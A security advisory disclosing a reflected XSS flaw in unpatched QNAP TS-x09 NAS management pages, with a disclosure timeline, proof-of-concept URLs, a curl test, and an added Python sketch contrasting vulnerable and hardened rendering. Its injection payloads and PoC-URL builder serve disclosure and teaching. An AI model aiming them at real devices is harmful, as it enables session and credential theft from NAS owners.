On the 7th of July 2015 I discovered a reflected cross-site scripting (XSS) vulnerability in QNAP TS-x09 Network Attached Storage devices. Full details were disclosed to the vendor and a CVE-ID has been requested from MITRE.

CVE-ID: requested via PGP email 7th July 2015
Author: Mark Cross
Twitter: @xerubus
WWW: www.mogozobo.com
Reference: http://www.mogozobo.com/?p=2574

==================== Summary ====================

A reflected cross-site scripting vulnerability was found in QNAP TS-109/209/409/409U Turbo NAS devices, including Standard, II, PRO and PRO-II models running firmware <= Version 3.3.3 Build 1003T. The sid parameter of cgi-bin/user_index.cgi and cgi-bin/index.cgi is reflected unescaped into a JavaScript string literal in the returned page, so a remote unauthenticated attacker can break out of the quotation marks and inject arbitrary JavaScript that executes in the victim's browser.

==================== Disclosure Timeline ====================

07 July 2015
– Requested PGP key from vendor via website for secure communications.
– Requested CVE identifier from MITRE via PGP.

08 July 2015
– Received email from vendor with security contact and PGP key.
– Received email from MITRE requesting further information.
– Emailed vendor full vulnerability details via PGP email.
– Emailed further details to MITRE as requested.

10 July 2015
– Emailed security contact for confirmation of receipt of previous email.

13 July 2015
– Requested acceptance and a mutually agreeable disclosure period.

21 July 2015
– Vendor advised they will not be releasing a new firmware.
– Advised vendor that the public disclosure date will be Friday 24th July 2015.

24 July 2015
– Provided MITRE with full vulnerability details.
– Advised MITRE that vendor will not be patching the vulnerability.
– Re-requested CVE-IDs be released.
– Vulnerability published on mogozobo.com.
– Vulnerability publicly disclosed via the Full Disclosure mailing list.
==================== Status ====================

Published

==================== Tested versions ====================

This vulnerability was tested on the following QNAP devices:
– TS-109 PRO and TS-109 II, Version 3.3.0 Build 0924T
– TS-209 and TS-209 PRO II, Version 3.3.3 Build 1003T
– TS-409 and TS-409U, Version 3.3.2 Build 0918T

==================== Details ====================

The QNAP NAS Management Software, embedded as firmware, is accessible via a web-based interface on all Turbo NAS devices. The sid parameter of cgi-bin/user_index.cgi and cgi-bin/index.cgi is written unescaped into a JavaScript string literal in the returned page. A remote unauthenticated attacker can close the quotation marks and append arbitrary JavaScript, which the victim's browser executes when it renders the reflected page (the injection is reflected, not stored, so each victim must request the crafted URL).

An attacker may exploit the reflected XSS vulnerability by luring a victim to a crafted URL, causing the malicious JavaScript to run in the victim's browser within the origin of the NAS management interface. The malicious code can, among other things, steal the victim's session token or login credentials, log the victim's keystrokes, or perform arbitrary actions on the victim's behalf.

==================== Vulnerable URLs ====================

http://target:8080/cgi-bin/user_index.cgi
http://target:8080/cgi-bin/index.cgi

==================== XSS Proof-of-concept (POC) ====================

The following proof-of-concept (POC) demonstrates the injection:

http://target:8080/cgi-bin/user_index.cgi?sid=%22%3balert%28%22XSS%22%29%2f%2f
http://target:8080/cgi-bin/index.cgi?sid=%22%3balert%28%22XSS%22%29%2f%2f

The URL-decoded payload is ";alert("XSS")// : the leading double quote closes the string literal, the semicolon ends the assignment, alert("XSS") runs, and the trailing // comments out the page's own closing quote and semicolon so the script remains syntactically valid. The curl output below shows the reflected statement exactly as the server returns it (the target host is redacted in the command).

# Example
$ curl -A "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" 'http://:8080/cgi-bin/user_index.cgi?sid=";alert("XSS")//' -s | grep XSS
var sid = "";alert("XSS")//";

==================== Vulnerability solution ====================

QNAP have advised that they will not release a new firmware to address the vulnerability.
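To make the injection mechanics concrete, the following is an added Python example; it is not QNAP's code and is not part of the original advisory. render_vulnerable is a hypothetical reconstruction of the reflection inferred only from the grep output above (the 'var sid = "..."' template is an assumption), render_hardened shows the same statement with the value encoded for a JavaScript string context, value_stays_in_literal is a small classifier that tells the two apart, and poc_url builds the percent-encoded PoC URL from the raw payload.

```python
import json
from urllib.parse import quote

# Constructed from the advisory's PoC: the URL-decoded value of the sid parameter.
PAYLOAD = '";alert("XSS")//'


def render_vulnerable(sid: str) -> str:
    """Hypothetical reconstruction of the reflection the advisory's grep output
    shows: the raw parameter is dropped straight into a JavaScript string
    literal. This is not QNAP's code; it only reproduces the observed output."""
    return 'var sid = "%s";' % sid


def render_hardened(sid: str) -> str:
    """Same statement with the value encoded for a JavaScript string context.

    json.dumps (ensure_ascii=True by default) produces a double-quoted literal
    in which backslashes, double quotes, control characters and every
    non-ASCII character (including the U+2028/U+2029 line terminators) are
    escaped. '<' is additionally written as \\u003c so a value containing
    </script> cannot terminate the enclosing script element either.
    """
    literal = json.dumps(sid).replace('<', '\\u003c')
    return 'var sid = %s;' % literal


def value_stays_in_literal(stmt: str) -> bool:
    """Minimal check used here to classify a rendered statement: True iff it is
    exactly  var sid = "<one JS string literal>";  so nothing the attacker
    supplied is parsed as code outside the quotes."""
    prefix = 'var sid = "'
    if not stmt.startswith(prefix):
        return False
    i = len(prefix)
    while i < len(stmt):
        c = stmt[i]
        if c == '\\':          # backslash escape: skip the escaped character
            i += 2
            continue
        if c == '"':           # closing quote: only the trailing ';' may follow
            return stmt[i + 1:] == ';'
        i += 1
    return False               # unterminated literal


def poc_url(host: str, cgi: str, payload: str = PAYLOAD) -> str:
    """Builds the percent-encoded PoC URL for one of the two affected CGIs."""
    return 'http://%s:8080/cgi-bin/%s?sid=%s' % (host, cgi, quote(payload, safe=''))


if __name__ == '__main__':
    print(render_vulnerable(PAYLOAD))                          # var sid = "";alert("XSS")//";
    print(render_hardened(PAYLOAD))                            # var sid = "\";alert(\"XSS\")//";
    print(value_stays_in_literal(render_vulnerable(PAYLOAD)))  # False
    print(value_stays_in_literal(render_hardened(PAYLOAD)))    # True
    print(poc_url('target', 'user_index.cgi'))
```

The vulnerable renderer reproduces the advisory's grep line character for character, and the classifier reports that the payload has escaped the literal; the hardened renderer keeps the same payload inside the quotes. Encoding for the JavaScript string context (rather than HTML-escaping, which would leave the double quote intact as `&quot;` only in HTML attribute contexts) is the fix the affected pages would have needed.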